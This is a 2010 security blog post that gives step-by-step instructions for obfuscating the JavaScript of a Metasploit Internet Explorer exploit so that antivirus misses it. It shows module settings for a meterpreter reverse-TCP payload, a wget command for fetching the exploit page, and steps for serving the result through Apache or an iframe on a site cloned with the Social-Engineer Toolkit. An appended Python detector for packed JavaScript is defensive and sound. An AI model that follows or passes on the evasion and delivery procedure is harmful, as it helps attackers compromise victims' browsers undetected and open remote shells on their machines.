12.03.2010

JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass

1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip:

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     10.20.30.40      yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used
   URIPATH     /example         no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     10.20.30.40      yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

2. Run "exploit" to start the HTTP server (port 80) and the payload handler (port 443).
3. Fetch the exploit URI with wget, using the --user-agent option to supply the user-agent string of the browser you're targeting (the module serves browser-specific content). Example for IE7 on XP targets:

wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"

4. View the HTML source and copy all JavaScript between the "script" tags.

5. Feed to a JavaScript obfuscator of your liking. Examples:

http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
http://javascriptcompressor.com
http://dean.edwards.name/weblog/2007/04/packer3

6. Copy the obfuscated JS into a new HTML file.
7. Start a new multi/handler to receive the meterpreter/reverse_tcp shell on port 443 (or whatever port your payload requires).

8. Serve your newly obfuscated HTML from BT4 (BackTrack 4) through Apache, or clone a site with SET (the Social-Engineer Toolkit) and edit the embedded iframe tag to point to your HTML file.
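The flip side of the procedure above is what a responder or proxy sees: the exploit JavaScript is gone, but the obfuscator leaves its own fingerprints in the served HTML. The following detector is an added example written for this post (it is not code from the original post, from Metasploit or from the obfuscators linked above); the indicator names, thresholds and the two sample pages are constructed for illustration. It pulls inline script bodies out of an HTML response (step 4 in reverse) and flags the packer wrapper that Dean Edwards' packer emits, eval() over a runtime-built string, long runs of %uXXXX escapes as used in heap-spray strings, repeated String.fromCharCode calls, and packed-code density (a long script with almost no whitespace).

```python
import re
from typing import Dict, List

# Constructed indicator set for illustration; names and thresholds are assumptions.
INDICATORS = {
    # wrapper emitted by Dean Edwards' packer (p,a,c,k,e,r / p,a,c,k,e,d)
    "packer_wrapper": re.compile(r"eval\(function\(p,a,c,k,e,[rd]\)"),
    # eval() applied to a string assembled at runtime
    "eval_of_built_string": re.compile(
        r"eval\(\s*(?:unescape|String\.fromCharCode|[A-Za-z_$][\w$]*\s*\+)"),
    # eight or more consecutive %uXXXX escapes, the shape of a sprayed string
    "percent_u_run": re.compile(r"(?:%u[0-9A-Fa-f]{4}){8,}"),
}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def extract_scripts(html: str) -> List[str]:
    """Return the body of every inline <script> block in the response."""
    return SCRIPT_RE.findall(html)


def whitespace_ratio(js: str) -> float:
    """Fraction of characters that are whitespace; packed output is close to zero."""
    if not js:
        return 0.0
    return sum(ch.isspace() for ch in js) / len(js)


def score_script(js: str) -> Dict[str, bool]:
    """Evaluate every indicator against one script body."""
    hits = {name: bool(rx.search(js)) for name, rx in INDICATORS.items()}
    hits["fromcharcode_heavy"] = js.count("String.fromCharCode") >= 3
    # assumed threshold: more than 300 chars with under 2% whitespace
    hits["packed_density"] = len(js) > 300 and whitespace_ratio(js) < 0.02
    return hits


def scan_html(html: str) -> List[str]:
    """Sorted, de-duplicated names of indicators hit by any script in the page."""
    found = set()
    for js in extract_scripts(html):
        found.update(name for name, hit in score_script(js).items() if hit)
    return sorted(found)


def verdict(html: str, threshold: int = 2) -> str:
    """Two or more independent indicators is the (assumed) bar for 'suspicious'."""
    return "suspicious" if len(scan_html(html)) >= threshold else "clean"


# Constructed sample 1: an ordinary page with a small hand-written script.
BENIGN_PAGE = """<html><head><title>Status</title>
<script type="text/javascript">
function refresh() {
    var el = document.getElementById("status");
    el.innerHTML = "Last update: " + new Date().toString();
}
window.onload = refresh;
</script></head><body><div id="status"></div></body></html>"""

# Constructed sample 2: packer-style wrapper around a dummy %u4141 filler string.
# The body is inert (no exploit, no shellcode); only its shape is of interest.
PACKED_BODY = (
    "eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;"
    "k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])"
    "p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}"
    "('0 1=2(\"" + "%u4141" * 16 + "\");0 3=[];4(0 5=0;5<6;5++){3[5]=1+1}',7,7,"
    "'var|s|unescape|a|for|i|64'.split('|'),0,{}))"
)
PACKED_PAGE = "<html><body><script>" + PACKED_BODY + "</script></body></html>"

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("packed", PACKED_PAGE)):
        print(label, verdict(page), scan_html(page))
```

Minified libraries also have very low whitespace density, so packed_density on its own is not a verdict; the scoring requires a second, independent indicator before a page is called suspicious. In practice the regex indicators would be applied to the decoded HTTP body at a proxy or in a PCAP carve, and the hit list is what you would write into the alert.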

Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}

Thanks to Will Metcalf for pointing me in the right direction!

References:
http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/
http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html
http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html

1 comment:

c0d3inj3cT said...

Now the option to obfuscate the JavaScript is included within the exploit module itself.

It is set to true by default.